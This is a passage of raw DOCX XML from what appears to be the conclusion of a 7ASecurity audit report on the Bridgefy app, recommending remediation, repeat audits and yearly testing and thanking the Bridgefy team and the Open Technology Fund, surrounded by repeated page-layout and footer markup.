          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="228"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="364"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is advised to address all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>report,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>including</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>informational</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>low severity tickets where possible. This will not just strengthen the security posture of the application significantly, but also reduce the number of tickets in future audits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Once all issues</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>addressed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>verified,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>more</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>thorough</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>review,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ideally including another code audit, is highly recommended to ensure adequate security coverage of the platform. This provides auditors with an edge over possible malicious adversaries that do not have significant time or budget constraints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="363"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Please note that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>audits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>should</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ideally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>allow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>greater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>budget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>teams are able to deep dive into more complex attack scenarios.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>could be third party integrations, complex features that require to exercise all the application logic for full visibility, authentication flows, challenge-response mechanisms implemented, subtle vulnerabilities, logic bugs and complex vulnerabilities derived from the inner workings of dependencies in the context of the application. Additionally, the scope could perhaps be extended to include other internet-facing Bridgefy resources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="371"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is suggested to test the application regularly, at least once a year</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>when</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>substantial changes are going to be deployed, to make sure new features do not introduce undesired</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>vulnerabilities.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>proven</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>strategy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>reduce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>number</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>security issues consistently and make the application highly resilient against online attacks over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="367"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>7ASecurity would like to take this opportunity to sincerely thank Jorge Ríos, Gilberto Julián de la Orta, Guillermo Haro, Miguel Tec and the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>rest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Bridgefy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>team,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>their exemplary assistance and support throughout this audit. Last but</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>least,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>appreciation must be extended to the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Open Technology Fund (OTF) </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for sponsoring this project.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="10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Consolas">
    <w:altName w:val="Consolas"/>
    <w:charset w:val="1"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:altName w:val="Courier New"/>
    <w:charset w:val="1"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Century Gothic">
    <w:altName w:val="Century Gothic"/>
    <w:charset w:val="1"/>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4952064">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>9312440</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2857500" cy="745959"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="5" name="Image 5"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="5" name="Image 5"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2857500" cy="745959"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484952576">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>5019675</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>9398165</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2752725" cy="660234"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="6" name="Image 6"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="6" name="Image 6"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2752725" cy="660234"/>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4953088">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3187700</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9190463</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1357630" cy="397510"/>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1357630" cy="397510"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="12"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:hyperlink r:id="rId3">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="1154CC"/>
                                <w:sz w:val="24"/>
                                <w:u w:val="single" w:color="1154CC"/>
                              </w:rPr>
                              <w:t>7ASecurity</w:t>
                            </w:r>
                          </w:hyperlink>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1154CC"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>© </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:spacing w:val="-4"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>2023</w:t>
                          </w:r>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="41"/>
                            <w:ind w:left="82" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="begin"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:instrText> PAGE </w:instrText>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="separate"/>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>100</w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:fldChar w:fldCharType="end"/>
                          </w:r>
                        </w:p>
                      </w:txbxContent>
                    </wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape style="position:absolute;margin-left:251pt;margin-top:723.658569pt;width:106.9pt;height:31.3pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-18363392" type="#_x0000_t202" id="docshape3" filled="false" stroked="false">
              <v:textbox inset="0,0,0,0">
                <w:txbxContent>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="12"/>
                      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:hyperlink r:id="rId3">
                      <w:r>
                        <w:rPr>
                          <w:b/>
                          <w:color w:val="1154CC"/>
                          <w:sz w:val="24"/>
                          <w:u w:val="single" w:color="1154CC"/>
                        </w:rPr>
                        <w:t>7ASecurity</w:t>
                      </w:r>
                    </w:hyperlink>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:color w:val="1154CC"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t> </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>© </w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:b/>
                        <w:spacing w:val="-4"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>2023</w:t>
                    </w:r>
                  </w:p>
                  <w:p>
                    <w:pPr>
                      <w:spacing w:before="41"/>
                      <w:ind w:left="82" w:right="0" w:firstLine="0"/>
                      <w:jc w:val="center"/>
                      <w:rPr>
                        <w:sz w:val="24"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:instrText> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>
                      </w:rPr>
                      <w:t>100</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="24"/>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4952064">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>9312440</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2857500" cy="745959"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="10" name="Image 10"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="10" name="Image 10"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2857500" cy="745959"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:anchor>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="484952576">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:posOffset>5019675</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:posOffset>9398165</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2752725" cy="660234"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapNone/>
          <wp:docPr id="11" name="Image 11"/>
          <wp:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </wp:cNvGraphicFramePr>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="11" name="Image 11"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2" cstate="print"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2752725" cy="660234"/>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4953088">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:posOffset>3187700</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>9190463</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="1357630" cy="397510"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="12" name="Textbox 12"/>
              <wp:cNvGraphicFramePr>
                <a:graphicFrameLocks/>
              </wp:cNvGraphicFramePr>
              <a:graphic>
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvPr id="12" name="Textbox 12"/>
                    <wps:cNvSpPr txBox="1"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="1357630" cy="397510"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </wps:spPr>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="12"/>
                            <w:ind w:left="0" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:hyperlink r:id="rId3">
                            <w:r>
                              <w:rPr>
                                <w:b/>
                                <w:color w:val="1154CC"/>
                                <w:sz w:val="24"/>
                                <w:u w:val="single" w:color="1154CC"/>
                              </w:rPr>
                              <w:t>7ASecurity</w:t>
                            </w:r>
                          </w:hyperlink>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:color w:val="1154CC"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t> </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>© </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:b/>
                              <w:spacing w:val="-4"/>
                              <w:sz w:val="24"/>
                            </w:rPr>
                            <w:t>2023</w:t>
                          </w:r>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:spacing w:before="41"/>
                            <w:ind w:left="82" w:right="0" w:firstLine="0"/>
                            <w:jc w:val="center"/>
                            <w:rPr>
                              <w:sz w:val="24"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr>
                              <w:spacing w:val="-5"/>
